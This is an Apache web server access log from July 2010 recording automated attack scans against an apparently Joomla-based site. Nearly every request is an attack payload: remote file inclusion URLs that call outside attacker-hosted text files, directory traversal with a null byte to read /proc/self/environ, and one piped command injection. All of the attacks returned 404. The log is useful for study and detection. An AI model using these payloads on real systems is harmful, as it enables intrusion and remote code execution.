91.206.218.32 - - [26/Jul/2010:16:18:56 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:18:56 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:18:56 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:19:18 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:19:18 +0200] "GET /logs/access_log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:19:18 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:20:57 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:20:57 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:20:57 +0200] "GET /logs/access_log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:21:28 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:21:28 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:21:28 +0200] "GET /logs/access_log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
114.108.151.149 - - [26/Jul/2010:16:22:34 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
174.121.240.147 - - [26/Jul/2010:16:27:10 +0200] "GET //logs/access_100612.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.810"
114.108.151.149 - - [26/Jul/2010:16:33:42 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
67.195.112.43 - - [26/Jul/2010:16:33:56 +0200] "GET / HTTP/1.0" 200 560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.151.149 - - [26/Jul/2010:16:35:02 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:39:34 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:42:48 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:44:39 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:44:39 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:44:40 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:46:40 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:46:41 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:46:41 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
174.121.240.147 - - [26/Jul/2010:16:48:55 +0200] "GET /logs/access_log//logs/access_100612.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 337 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:16:48:55 +0200] "GET //logs/access_100612.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:16:48:55 +0200] "GET /logs//logs/access_100612.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-" "libwww-perl/5.810"
207.46.199.199 - - [26/Jul/2010:16:49:50 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.116.59.107 - - [26/Jul/2010:17:05:47 +0200] "GET /logs/error_log%20%20/become_editor.php?theme_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 321 "-" "Mozilla/5.0"
209.116.59.107 - - [26/Jul/2010:17:05:47 +0200] "GET /logs/become_editor.php?theme_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 309 "-" "Mozilla/5.0"
209.116.59.107 - - [26/Jul/2010:17:05:48 +0200] "GET /become_editor.php?theme_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 304 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:09:24 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:09:24 +0200] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 356 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:09:24 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:09:45 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:09:45 +0200] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 356 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:09:45 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:11:22 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:11:22 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:11:22 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:11:28 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:11:28 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:11:28 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
114.108.151.149 - - [26/Jul/2010:17:11:30 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:11:31 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:11:32 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:17:13:52 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.165.213.8 - - [26/Jul/2010:17:15:51 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:17:15:52 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:17:15:52 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
77.222.34.35 - - [26/Jul/2010:17:18:29 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:18:29 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:18:29 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:18:35 +0200] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 356 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:18:35 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:18:35 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:18:39 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:18:39 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:18:39 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:18:54 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:18:54 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:18:54 +0200] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 356 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:21:01 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:21:01 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:21:01 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:21:16 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:21:16 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:21:16 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
209.116.59.107 - - [26/Jul/2010:17:22:04 +0200] "GET /logs/error_log/become_editor.php?theme_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 319 "-" "Mozilla/5.0"
209.116.59.107 - - [26/Jul/2010:17:22:24 +0200] "GET /logs/access_log/become_editor.php?theme_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 320 "-" "Mozilla/5.0"
114.108.151.149 - - [26/Jul/2010:17:22:53 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:22:54 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:22:54 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
91.206.218.32 - - [26/Jul/2010:17:23:50 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:23:50 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:23:50 +0200] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 356 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:24:01 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:24:01 +0200] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 356 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:24:01 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:26:14 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:26:14 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:26:14 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:26:30 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:26:30 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:26:30 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
217.16.18.219 - - [26/Jul/2010:17:27:22 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:17:27:22 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:17:27:23 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
207.46.204.189 - - [26/Jul/2010:17:31:20 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.189 - - [26/Jul/2010:17:36:31 +0200] "GET / HTTP/1.1" 200 560 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.202.2.34 - - [26/Jul/2010:17:48:53 +0200] "GET /logs/access_log%20%20//index.php?option=com_bca-rss-syndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:17:48:53 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:17:48:53 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:17:48:53 +0200] "GET /logs/access_log%20%20//index.php?option=com_bca-rss-syndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:17:48:53 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:17:48:53 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
114.108.176.9 - - [26/Jul/2010:17:59:41 +0200] "GET //index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
114.108.176.9 - - [26/Jul/2010:17:59:41 +0200] "GET /logs//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
114.108.176.9 - - [26/Jul/2010:17:59:41 +0200] "GET /logs/access_log%20%20//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
217.16.18.219 - - [26/Jul/2010:17:59:47 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.176.9 - - [26/Jul/2010:18:00:36 +0200] "GET /logs//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
114.108.176.9 - - [26/Jul/2010:18:00:36 +0200] "GET //index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
114.108.176.9 - - [26/Jul/2010:18:00:36 +0200] "GET /logs/access_log%20%20//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
217.16.18.219 - - [26/Jul/2010:18:00:43 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
207.46.199.177 - - [26/Jul/2010:18:04:02 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.176.9 - - [26/Jul/2010:18:10:09 +0200] "GET /logs/access_log//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
114.108.176.9 - - [26/Jul/2010:18:10:13 +0200] "GET /logs/access_log//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
194.149.14.77 - - [26/Jul/2010:18:12:05 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:18:13:52 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
